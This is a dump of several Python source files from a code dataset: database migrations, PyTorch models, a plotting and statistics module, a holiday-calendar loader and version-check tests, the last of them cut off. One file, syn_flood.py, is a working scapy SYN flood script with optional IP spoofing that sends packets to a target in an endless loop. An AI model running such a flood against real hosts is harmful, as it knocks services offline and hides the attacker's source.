max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
libweasyl/libweasyl/alembic/versions/f9226a83bbb6_remove_dead_ads_table.py
akash143143/weasyl
111
61186
"""Remove dead ads table Revision ID: <KEY> Revises: 1307b62614a4 Create Date: 2020-02-27 23:14:41.314000 """ # revision identifiers, used by Alembic. revision = '<KEY>' down_revision = '1307b62614a4' from alembic import op # lgtm[py/unused-import] import sqlalchemy as sa # lgtm[py/unused-import] from sqlalchemy.dialects import postgresql def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index('ind_ads_end', table_name='ads') op.drop_table('ads') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('ads', sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), sa.Column('owner', sa.VARCHAR(length=254), autoincrement=False, nullable=False), sa.Column('link_target', sa.TEXT(), autoincrement=False, nullable=False), sa.Column('file', sa.INTEGER(), autoincrement=False, nullable=False), sa.Column('start', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.Column('end', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.ForeignKeyConstraint(['file'], [u'media.mediaid'], name=u'ads_file_fkey', onupdate=u'CASCADE', ondelete=u'CASCADE'), sa.PrimaryKeyConstraint('id', name=u'ads_pkey') ) op.create_index('ind_ads_end', 'ads', ['end'], unique=False) # ### end Alembic commands ###
test/testdata/malformed.py
Scartography/mapchete
161
61209
# contains neither Process object nor execute() function
report_builder_scheduled/migrations/0002_auto_20180413_0747.py
nazmizorlu/django-report-builder
560
61224
# Generated by Django 2.0.4 on 2018-04-13 07:47 from django.conf import settings from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('report_builder_scheduled', '0001_initial'), ] operations = [ migrations.AlterField( model_name='scheduledreport', name='last_run_at', field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now), preserve_default=False, ), migrations.AlterField( model_name='scheduledreport', name='users', field=models.ManyToManyField(blank=True, help_text='Staff users to notify', limit_choices_to={'is_staff': True}, to=settings.AUTH_USER_MODEL), ), ]
lav/models/rgb.py
Kin-Zhang/LAV
122
61247
import torch from torch import nn from torch.nn import functional as F from .resnet import resnet18, resnet34 from .segmentation import SegmentationHead from .attention import Attention from .erfnet import ERFNet class Normalize(nn.Module): """ ImageNet normalization """ def __init__(self, mean, std): super().__init__() self.mean = nn.Parameter(torch.tensor(mean), requires_grad=False) self.std = nn.Parameter(torch.tensor(std), requires_grad=False) def forward(self, x): return (x - self.mean[None,:,None,None]) / self.std[None,:,None,None] class RGBModel(nn.Module): def __init__(self, seg_channels, pretrained=True): super().__init__() self.num_channels = len(seg_channels) self.backbone = resnet18(pretrained=pretrained) self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) self.head = None def forward(self, rgb): embd = self.backbone(self.normalize(rgb/255.)) return self.head(embd).squeeze(-1) class RGBSegmentationModel(nn.Module): def __init__(self, seg_channels): super().__init__() self.erfnet = ERFNet(len(seg_channels)+1) self.normalize = lambda x: (x/255.-.5)*2 def forward(self, rgb): return self.erfnet(self.normalize(rgb)) class RGBBrakePredictionModel(nn.Module): def __init__(self, seg_channels, pretrained=True): super().__init__() self.conv_backbone = resnet18(pretrained=pretrained) self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) self.seg_head = SegmentationHead(512, len(seg_channels)+1) self.classifier = nn.Sequential( nn.Linear(1024,1), nn.Sigmoid() ) def forward(self, rgb1, rgb2, mask=False): x1 = self.conv_backbone(self.normalize(rgb1/255.)) x2 = self.conv_backbone(self.normalize(rgb2/255.)) h1 = x1.mean(dim=[2,3]) h2 = x2.mean(dim=[2,3]) pred_bra = self.classifier(torch.cat([h1,h2], dim=1)) if mask: pred_sem1 = F.interpolate(self.seg_head(x1), scale_factor=4) pred_sem2 = F.interpolate(self.seg_head(x2), scale_factor=4) return pred_bra[:,0], pred_sem1, pred_sem2 else: return pred_bra[:,0]
Validation/RecoB/python/bTagAnalysis_harvesting_cfi.py
ckamtsikis/cmssw
852
61273
import FWCore.ParameterSet.Config as cms # BTagPerformanceAnalyzer configuration from Validation.RecoB.bTagAnalysis_cfi import * bTagValidationHarvest = bTagHarvestMC.clone() from DQMOffline.RecoB.bTagAnalysisData_cfi import * bTagValidationHarvestData = bTagHarvest.clone()
scapy/syn-flood/syn_flood.py
caesarcc/python-code-tutorials
1,059
61294
from scapy.all import * import argparse parser = argparse.ArgumentParser(description="Simple SYN Flood Script") parser.add_argument("target_ip", help="Target IP address (e.g router's IP)") parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \ e.g 80 for HTTP, 22 for SSH and so on).") # parse arguments from the command line args = parser.parse_args() # target IP address (should be a testing router/firewall) target_ip = args.target_ip # the target port u want to flood target_port = args.port # forge IP packet with target ip as the destination IP address ip = IP(dst=target_ip) # or if you want to perform IP Spoofing (will work as well) # ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip) # forge a TCP SYN packet with a random source port # and the target port as the destination port tcp = TCP(sport=RandShort(), dport=target_port, flags="S") # add some flooding data (1KB in this case, don't increase it too much, # otherwise, it won't work.) raw = Raw(b"X"*1024) # stack up the layers p = ip / tcp / raw # send the constructed packet in a loop until CTRL+C is detected send(p, loop=1, verbose=0)
Python/data_exchange.py
PushpneetSingh/Hello-world
1,428
61318
<filename>Python/data_exchange.py a = 1 b = 2 print('a = ' + str(a) + ',' + 'b = ' + str(b)) temp = a a = b b = temp print('a = ' + str(a) + ',' + 'b = ' + str(b))
visualize_ML/relation.py
weme123/visualize_ML
195
61349
import pandas as pd import numpy as np from numpy import corrcoef import matplotlib.pyplot as plt from sklearn.feature_selection import chi2 from sklearn.feature_selection import f_classif from math import * plt.style.use('ggplot') fig = plt.figure() COUNTER = 1 #Return the category dictionary,categorical variables list and continuous list for every column in dataframe. #The categories are assigned as "target(type)_feature(type)" def get_category(df,target_name,categorical_name,columns_name): cat_dict = {} fin_cat_dict = {} catg_catg = [] cont_cont = [] catg_cont = [] cont_catg = [] for col in columns_name: if len(df[col].unique())<=2: cat_dict[col] = "categorical" elif col in categorical_name: cat_dict[col] = "categorical" else: cat_dict[col] = "continous" for col in cat_dict: if cat_dict[col]=="categorical" and cat_dict[target_name]=="categorical": fin_cat_dict[col] = "catg_catg" catg_catg.append(col) elif cat_dict[col]=="continous" and cat_dict[target_name]=="continous": fin_cat_dict[col] = "cont_cont" cont_cont.append(col) elif cat_dict[col]=="continous" and cat_dict[target_name]=="categorical": fin_cat_dict[col] = "catg_cont" catg_cont.append(col) else: fin_cat_dict[col] = "cont_catg" cont_catg.append(col) return fin_cat_dict,catg_catg,cont_cont,catg_cont,cont_catg #Return True if the categorical_name are present in the orignal dataframe columns. def is_present(columns_name,categorical_name): ls = [i for i in categorical_name if i not in columns_name] if len(ls)==0: return True else: raise ValueError(str(ls)+" is not present as a column in the data,Please check the name") #Function returns list of columns with non-numeric data. def clean_str_list(df,lst): rem=[] for i in lst: res = any(isinstance(n,str) for n in df[i]) if res == True: rem.append(i) for j in rem: lst.remove(j) return lst #Returns the Pearson Correlation Coefficient for the continous data columns. def pearson_correlation_cont_cont(x,y): return corrcoef(x,y) # This function is for the bivariate analysis between two continous varibale.Plots scatter plots and shows the coeff for the data. def bivariate_analysis_cont_cont(cont_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE): clean_cont_cont_list = clean_str_list(df,cont_cont_list) if len(clean_str_list(df,[target_name])) == 0 and len(cont_cont_list)>0: raise ValueError("You seem to have a target variable with string values.") clean_df = df.dropna() for col in clean_cont_cont_list: summary = clean_df[col].describe() count = summary[0] mean = summary[1] std = summary[2] plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER) plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10) x = clean_df[col] y = np.float32(clean_df[target_name]) corr = pearson_correlation_cont_cont(x,y) plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])), fontsize=10) plt.ylabel(target_name, fontsize=10) plt.scatter(x,y) print (col+" vs "+target_name+" plotted....") COUNTER +=1 return plt,COUNTER #Chi test is used to see association between catgorical vs categorical variables. #Lower Pvalue are significant they should be < 0.05 #chi value = X^2 = summation [(observed-expected)^2/expected] # The distribution of the statistic X2 is chi-square with (r-1)(c-1) degrees of freedom, where r represents the number of rows in the two-way table and c represents the number of columns. The distribution is denoted (df), where df is the number of degrees of freedom. #pvalue = p(df>=x^2) def evaluate_chi(x,y): chi,p_val = chi2(x,y) return chi,p_val def bivariate_analysis_catg_catg(catg_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size="auto"): clean_catg_catg_list = clean_str_list(df,catg_catg_list) clean_df = df.dropna() target_classes =df[target_name].unique() label = [str(i) for i in target_classes] c = 0 for col in clean_catg_catg_list: summary = clean_df[col].describe() binwidth = 0.7 if bin_size == 'auto': bins_size =np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth) else: bins_size = bin_size count = summary[0] mean = summary[1] std = summary[2] plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER) plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10) x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in target_classes] y = clean_df[target_name] chi,p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1,1),y) plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]), fontsize=10) plt.ylabel("Frequency", fontsize=10) plt.hist(x,bins=bins_size,stacked=True,label = label) plt.legend(prop={'size': 10}) print (col+" vs "+target_name+" plotted....") COUNTER +=1 c+=1 return plt,COUNTER # Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups) # In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance. # A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test. def evaluate_anova(x,y): F_value,pvalue = f_classif(x,y) return F_value,pvalue # In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram. # Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data def bivariate_analysis_cont_catg(cont_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE): clean_cont_catg_list = clean_str_list(df,cont_catg_list) if len(clean_str_list(df,[target_name])) == 0 and len(cont_catg_list)>0: raise ValueError("You seem to have a target variable with string values.") clean_df = df.dropna() for col in clean_cont_catg_list: col_classes =clean_df[col].unique() summary = clean_df[col].describe() count = summary[0] mean = summary[1] std = summary[2] plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER) plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10) x = [np.array(clean_df[clean_df[col]==i][target_name]) for i in col_classes] y = np.float32(clean_df[target_name]) f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y) plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10) plt.ylabel(target_name, fontsize=10) plt.boxplot(x) print (col+" vs "+target_name+" plotted....") COUNTER +=1 return plt,COUNTER # This function is for the bivariate analysis between categorical vs continuous varibale.Plots box plots. def bivariate_analysis_catg_cont(catg_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE): # No need to remove string varible as they are handled by chi2 function of sklearn. # clean_catg_cont_list = clean_str_list(df,catg_cont_list) clean_catg_cont_list = catg_cont_list clean_df = df.dropna() for col in clean_catg_cont_list: col_classes =df[target_name].unique() summary = clean_df[col].describe() count = summary[0] mean = summary[1] std = summary[2] plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER) plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10) x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in col_classes] y = clean_df[target_name] f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y) plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10) plt.ylabel(col, fontsize=10) plt.boxplot(x) print (col+" vs "+target_name+" plotted....") COUNTER +=1 return plt,COUNTER #returns the total number of subplots to be made. def total_subplots(df,lst): clean_df = df.dropna() total = [len(clean_str_list(clean_df,i)) for i in lst] return sum(total) # This function returns new categotical list after removing drop values if in case they are written in both drop and categorical_name list. def remove_drop_from_catglist(drop,categorical_name): for col in drop: if col in categorical_name: categorical_name.remove(col) return categorical_name def plot(data_input,target_name="",categorical_name=[],drop=[],PLOT_COLUMNS_SIZE = 4,bin_size="auto",wspace=0.5,hspace=0.8): """ This is the main function to give Bivariate analysis between the target variable and the input features. Parameters ----------- data_input : Dataframe This is the input Dataframe with all data. target_name : String The name of the target column. categorical_name : list Names of all categorical variable columns with more than 2 classes, to distinguish with the continuous variables. drop : list Names of columns to be dropped. PLOT_COLUMNS_SIZE : int Number of plots to display vertically in the display window.The row size is adjusted accordingly. bin_size : int ;default="auto" Number of bins for the histogram displayed in the categorical vs categorical category. wspace : int ;default = 0.5 Horizontal padding between subplot on the display window. hspace : int ;default = 0.5 Vertical padding between subplot on the display window. ----------- """ if type(data_input).__name__ == "DataFrame" : # Column names columns_name = data_input.columns.values #To drop user specified columns. if is_present(columns_name,drop): data_input = data_input.drop(drop,axis=1) columns_name = data_input.columns.values categorical_name = remove_drop_from_catglist(drop,categorical_name) else: raise ValueError("Couldn't find it in the input Dataframe!") if target_name == "": raise ValueError("Please mention a target variable") #Checks if the categorical_name are present in the orignal dataframe columns. categorical_is_present = is_present(columns_name,categorical_name) target_is_present = is_present(columns_name,[target_name]) if categorical_is_present: fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list = get_category(data_input,target_name,categorical_name,columns_name) #Subplot(Total number of graphs) total = total_subplots(data_input,[cont_cont_list,catg_catg_list,catg_cont_list,cont_catg_list]) if total < PLOT_COLUMNS_SIZE: total = PLOT_COLUMNS_SIZE PLOT_ROW_SIZE = ceil(float(total)/PLOT_COLUMNS_SIZE) #Call various functions plot,count = bivariate_analysis_cont_cont(cont_cont_list,data_input,target_name,total,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE) plot,count = bivariate_analysis_catg_catg(catg_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size=bin_size) plot,count = bivariate_analysis_cont_catg(cont_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE) plot,count = bivariate_analysis_catg_cont(catg_cont_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE) fig.subplots_adjust(bottom=0.08,left = 0.05,right=0.97,top=0.93,wspace = wspace,hspace = hspace) plot.show() else: raise ValueError("Make sure input data is a Dataframe.")
engineer/utils/gallery.py
lingtengqiu/Open-PIFuhd
191
61356
import os import numpy as np def save_samples_truncted_prob(fname, points, prob): ''' Save the visualization of sampling to a ply file. Red points represent positive predictions. Green points represent negative predictions. Parameters fname: File name to save points: [N, 3] array of points prob: [1, N] array of predictions in the range [0~1] Return: None ''' prob = prob.transpose(0, 1).detach().numpy() r = (prob > 0.5).reshape([-1, 1]) * 255 g = (prob < 0.5).reshape([-1, 1]) * 255 b = np.zeros(r.shape) to_save = np.concatenate([points, r, g, b,prob], axis=-1) return np.savetxt(fname, to_save, fmt='%.6f %.6f %.6f %d %d %d %.6f', comments='', header=( 'ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format( points.shape[0]) ) def save_gallery(preds,samples,names,gallery_id,epoch): pred = preds[0].cpu() sample = samples[0].transpose(0, 1).cpu() name = names[0] save_gallery_path = os.path.join(gallery_id,name.split('/')[-2],"epoch_{:03d}".format(epoch)) os.makedirs(save_gallery_path,exist_ok=True) path = os.path.join(save_gallery_path,'pred.ply') save_samples_truncted_prob(path,sample,pred)
exchange_rates/cbr_ru_parse.py
gil9red/SimplePyScripts
117
61409
<reponame>gil9red/SimplePyScripts #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' """Парсер курса доллара и евро за текущую дату от сайта центробанка России.""" import sys from datetime import date # pip install robobrowser from robobrowser import RoboBrowser date_req = date.today().strftime('%d.%m.%Y') url = 'http://www.cbr.ru/scripts/XML_daily.asp?date_req=' + date_req browser = RoboBrowser( user_agent='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', parser='html.parser' ) browser.open(url) rs = browser.response if not rs.ok: print(rs.status_code, rs.reason) sys.exit() for valute_el in browser.select('Valute'): char_code = valute_el.select_one('CharCode').get_text(strip=True) value = valute_el.select_one('Value').get_text(strip=True) if char_code in ['USD', 'EUR']: print(char_code, value)
tests/unit/butterfree/extract/pre_processing/test_explode_json_column.py
fossabot/butterfree
208
61464
from pyspark.sql.types import ( ArrayType, IntegerType, StringType, StructField, StructType, ) from butterfree.extract.pre_processing import explode_json_column from butterfree.testing.dataframe import ( assert_dataframe_equality, create_df_from_collection, ) def test_explode_json_column(spark_context, spark_session): # arrange input_data = [{"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}] target_data = [ { "json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}', "a": 123, "b": "abc", "c": 123, "d": [1, 2, 3], } ] input_df = create_df_from_collection(input_data, spark_context, spark_session) target_df = create_df_from_collection(target_data, spark_context, spark_session) json_column_schema = StructType( [ StructField("a", IntegerType()), StructField("b", StringType()), StructField("c", IntegerType()), StructField("d", ArrayType(IntegerType())), ] ) # act output_df = explode_json_column(input_df, "json_column", json_column_schema) # arrange assert_dataframe_equality(target_df, output_df)
ui/file_manager/video_player/js/cast/compiled_resources2.gyp
google-ar/chromium
777
61477
<filename>ui/file_manager/video_player/js/cast/compiled_resources2.gyp # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. { 'targets': [ # { # 'target_name': 'cast_extension_discoverer', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'cast_video_element', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'caster', # 'includes': ['../../../compile_js2.gypi'], # }, # { # 'target_name': 'media_manager', # 'includes': ['../../../compile_js2.gypi'], # }, ], }
backend/resources/calendar.py
sleepingAnt/viewfinder
645
61486
<reponame>sleepingAnt/viewfinder # Copyright 2012 Viewfinder Inc. All Rights Reserved. """Calendar datamodel. Calendars provide color to a chronology such as the Viewfinder search/ browse tool. Calendars are parsed from the "resources/calendars/" subdirectory on demand and cached. TODO(spencer): this is a very rough beginning meant to capture locale-specific holidays. We use here the holiday calendars provided by Mozilla. The idea in general is to provide an interface to arbitrary calendars, such as the wealth of calendars available via Google's calendar app. """ __author__ = '<EMAIL> (<NAME>)' import datetime import dateutil import logging import os import time import vobject from functools import partial from viewfinder.backend.base import util class Calendar(object): """Interface to loading ICS iCalendar calendar data.""" _RESOURCES_CALENDARS_FMT = '../../resources/calendars/%s' _DEFAULT_CALENDAR_ID = 'USHolidays.ics' """Mapping from locale to holidays calendar.""" _locale_to_holiday_calendar_map = { 'ar_DZ': 'AlgeriaHolidays.ics', 'es_AR': 'ArgentinaHolidays.ics', 'en_AU': 'AustraliaHolidays.ics', 'de_AT': 'AustrianHolidays.ics', 'eu_ES': 'BasqueHolidays.ics', 'nl_BE': 'BelgianDutchHolidays.ics', 'fr_BE': 'BelgianFrenchHolidays.ics', 'de_BE': 'BelgianHolidays.ics', 'es_BO': 'BoliviaHolidays.ics', 'pt_BR': 'BrazilHolidays.ics', 'bg_BG': 'BulgarianHolidays.ics', 'en_CA': 'CanadaHolidays.ics', 'es_CL': 'ChileHolidays.ics', 'zh_CN': 'ChinaHolidays.ics', 'es_CO': 'ColombianHolidays.ics', 'hr_HR': 'CroatiaHolidays.ics', 'cs_CZ': 'CzechHolidays.ics', 'da_DK': 'DanishHolidays.ics', 'be_NL': 'DutchHolidays.ics', 'nl_NL': 'DutchHolidays.ics', 'en_GB': 'EnglishHolidays.ics', 'et_EE': 'EstoniaHolidays.ics', 'fi_FI': 'FinlandHolidays.ics', 'sv_FI': 'FinlandHolidays.ics', 'fr_FR': 'FrenchHolidays.ics', 'fy_NL': 'FrisianHolidays.ics', 'de_DE': 'GermanHolidays.ics', 'en_HK': 'HongKongHolidays.ics', 'zh_HK': 'HongKongHolidays.ics', 'hu_HU': 'HungarianHolidays.ics', 'is_IS': 'IcelandHolidays.ics', 'id_ID': 'IndonesianHolidays.ics', 'it_IT': 'ItalianHolidays.ics', 'ja_JP': 'JapanHolidays.ics', 'sw_KE': 'KenyaHolidays.ics', 'so_KE': 'KenyaHolidays.ics', 'om_KE': 'KenyaHolidays.ics', 'kam_KE': 'KenyaHolidays.ics', 'lv_LV': 'LatviaHolidays.ics', 'lt_LT': 'LithuanianHolidays.ics', 'de_LU': 'LuxembourgHolidays.ics', 'fr_LU': 'LuxembourgHolidays.ics', 'en_NZ': 'NewZealandHolidays.ics', 'mi_NZ': 'NewZealandHolidays.ics', 'nb_NO': 'NorwegianHolidays.ics', 'en_PK': 'PakistanHolidays.ics', 'pa_Arab_PK': 'PakistanHolidays.ics', 'pa_PK': 'PakistanHolidays.ics', 'ur_PK': 'PakistanHolidays.ics', 'es_PE': 'PeruHolidays.ics', 'pl_PL': 'PolishHolidays.ics', 'pt_PT': 'PortugalHolidays.ics', 'en_QLD': 'QueenslandHolidays.ics', 'en_AU_QLD': 'QueenslandHolidays.ics', 'ro_MD': 'RomaniaHolidays.ics', 'ro_RO': 'RomaniaHolidays.ics', 'ru_RU': 'RussiaHolidays.ics', 'ru_UA': 'RussiaHolidays.ics', 'uk_UA': 'RussiaHolidays.ics', 'en_SG': 'SingaporeHolidays.ics', 'zh_Hans_SG': 'SingaporeHolidays.ics', 'zh_SG': 'SingaporeHolidays.ics', 'sk_SK': 'SlovakHolidays.ics', 'af_ZA': 'SouthAfricaHolidays.ics', 'en_ZA': 'SouthAfricaHolidays.ics', 'nr_ZA': 'SouthAfricaHolidays.ics', 'nso_ZA': 'SouthAfricaHolidays.ics', 'ss_ZA': 'SouthAfricaHolidays.ics', 'st_ZA': 'SouthAfricaHolidays.ics', 'tn_ZA': 'SouthAfricaHolidays.ics', 'ts_ZA': 'SouthAfricaHolidays.ics', 've_ZA': 'SouthAfricaHolidays.ics', 'xh_ZA': 'SouthAfricaHolidays.ics', 'zu_ZA': 'SouthAfricaHolidays.ics', 'ko_KR': 'SouthKoreaHolidays.ics', 'es_ES': 'SpanishHolidays.ics', 'si_LK': 'SriLankaHolidays.ics', 'sv_SE': 'SwedishHolidays.ics', 'de_CH': 'SwissHolidays.ics', 'fr_CH': 'SwissHolidays.ics', 'gsw_CH': 'SwissHolidays.ics', 'it_CH': 'SwissHolidays.ics', 'trv_TW': 'TaiwanHolidays.ics', 'zh_Hant_TW': 'TaiwanHolidays.ics', 'zh_TW': 'TaiwanHolidays.ics', 'th_TH': 'ThaiHolidays.ics', 'ku_Latn_TR': 'TurkeyHolidays.ics', 'ku_TR': 'TurkeyHolidays.ics', 'tr_TR': 'TurkeyHolidays.ics', 'cy_GB': 'UKHolidays.ics', 'en_GB': 'UKHolidays.ics', 'gv_GB': 'UKHolidays.ics', 'kw_GB': 'UKHolidays.ics', 'en': 'USHolidays.ics', 'en_US': 'USHolidays.ics', 'es_US': 'USHolidays.ics', 'haw_US': 'USHolidays.ics', 'es_UY': 'UruguayHolidays.ics', 'vi_VN': 'VietnamHolidays.ics', } """Cache for Calendar objects.""" _cache = dict() def __init__(self, calendar_id): """Prepares a calendar for the specified 'calendar_id'. """ self.calendar_id = calendar_id cal_path = os.path.dirname(__file__) path = os.path.join(cal_path, Calendar._RESOURCES_CALENDARS_FMT % self.calendar_id) with open(path, 'rb') as f: self._cal = vobject.readOne(f) def GetEvents(self, year): """Returns the events from the calendar for the year specified. In cases where the calendar does not span the requested year, throws a 'NoCalendarDataError' exception. """ events = [] for event in self._cal.components(): if event.name == 'VEVENT': name = event.summary.value if event.getrruleset(): rruleset = event.getrruleset() dates = rruleset.between(datetime.datetime(year - 1, 12, 31), datetime.datetime(year + 1, 1, 1)) if len(dates) >= 1: if len(dates) > 1: logging.warning('holiday %s occurs more than once a year: %r' % (name, dates)) delta = event.dtend.value - event.dtstart.value dtstart = dates[0] dtend = dtstart + delta events.append({'name': name, 'dtstart': time.mktime(dtstart.timetuple()), 'dtend': time.mktime(dtend.timetuple())}) else: dtstart = event.dtstart.value dtend = event.dtend.value if dtstart.year == year: events.append({'name': name, 'dtstart': time.mktime(dtstart.timetuple()), 'dtend': time.mktime(dtend.timetuple())}) return events @classmethod def GetCalendar(cls, calendar_id=None): """Attempts to locate a cached version of 'calendar_id'. If none is found, attempts to load from disk. """ calendar_id = calendar_id or Calendar._DEFAULT_CALENDAR_ID if not Calendar._cache.has_key(calendar_id): cal = Calendar(calendar_id) Calendar._cache[calendar_id] = cal return Calendar._cache[calendar_id] @classmethod def GetHolidaysByLocale(cls, locale='en_US'): """Attempts to match the specified locale with a holidays calendar. Normalizes the locale by replacing '-' with '_'. """ locale = locale.replace('-', '_') calendar_id = Calendar._locale_to_holiday_calendar_map.get(locale, None) or \ Calendar._DEFAULT_CALENDAR_ID return Calendar.GetCalendar(calendar_id)
roles/openshift_health_checker/test/aos_version_test.py
shgriffi/openshift-ansible
164
61554
import pytest import aos_version from collections import namedtuple Package = namedtuple('Package', ['name', 'version']) expected_pkgs = { "spam": { "name": "spam", "version": "3.2.1", "check_multi": False, }, "eggs": { "name": "eggs", "version": "3.2.1", "check_multi": False, }, } @pytest.mark.parametrize('pkgs,expected_pkgs_dict', [ ( # all found [Package('spam', '3.2.1'), Package('eggs', '3.2.1')], expected_pkgs, ), ( # found with more specific version [Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')], expected_pkgs, ), ( [Package('ovs', '2.6'), Package('ovs', '2.4')], { "ovs": { "name": "ovs", "version": ["2.6", "2.7"], "check_multi": False, } }, ), ( [Package('ovs', '2.7')], { "ovs": { "name": "ovs", "version": ["2.6", "2.7"], "check_multi": False, } }, ), ]) def test_check_precise_version_found(pkgs, expected_pkgs_dict): aos_version._check_precise_version_found(pkgs, expected_pkgs_dict) @pytest.mark.parametrize('pkgs,expect_not_found', [ ( [], { "spam": { "name": "spam", "version": "3.2.1", "check_multi": False, }, "eggs": { "name": "eggs", "version": "3.2.1", "check_multi": False, } }, # none found ), ( [Package('spam', '3.2.1')], { "eggs": { "name": "eggs", "version": "3.2.1", "check_multi": False, } }, # completely missing ), ( [Package('spam', '3.2.1'), Package('eggs', '3.3.2')], { "eggs": { "name": "eggs", "version": "3.2.1", "check_multi": False, } }, # not the right version ), ( [Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')], { "spam": { "name": "spam", "version": "3.2.1", "check_multi": False, } }, # eggs found with multiple versions ), ]) def test_check_precise_version_found_fail(pkgs, expect_not_found): with pytest.raises(aos_version.PreciseVersionNotFound) as e: aos_version._check_precise_version_found(pkgs, expected_pkgs) assert list(expect_not_found.values()) == e.value.problem_pkgs @pytest.mark.parametrize('pkgs,expected_pkgs_dict', [ ( [], expected_pkgs, ), ( # more precise but not strictly higher [Package('spam', '3.2.1.9')], expected_pkgs, ), ( [Package('ovs', '2.7')], { "ovs": { "name": "ovs", "version": ["2.6", "2.7"], "check_multi": False, } }, ), ]) def test_check_higher_version_found(pkgs, expected_pkgs_dict): aos_version._check_higher_version_found(pkgs, expected_pkgs_dict) @pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [ ( [Package('spam', '3.3')], expected_pkgs, ['spam-3.3'], # lower precision, but higher ), ( [Package('spam', '3.2.1'), Package('eggs', '3.3.2')], expected_pkgs, ['eggs-3.3.2'], # one too high ), ( [Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')], expected_pkgs, ['eggs-3.4'], # multiple versions, one is higher ), ( [Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')], expected_pkgs, ['eggs-3.4'], # multiple versions, two are higher ), ( [Package('ovs', '2.8')], { "ovs": { "name": "ovs", "version": ["2.6", "2.7"], "check_multi": False, } }, ['ovs-2.8'], ), ]) def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher): with pytest.raises(aos_version.FoundHigherVersion) as e: aos_version._check_higher_version_found(pkgs, expected_pkgs_dict) assert set(expect_higher) == set(e.value.problem_pkgs) @pytest.mark.parametrize('pkgs', [ [], [Package('spam', '3.2.1')], [Package('spam', '3.2.1'), Package('eggs', '3.2.2')], ]) def test_check_multi_minor_release(pkgs): aos_version._check_multi_minor_release(pkgs, expected_pkgs) @pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [ ( [Package('spam', '3.2.1'), Package('spam', 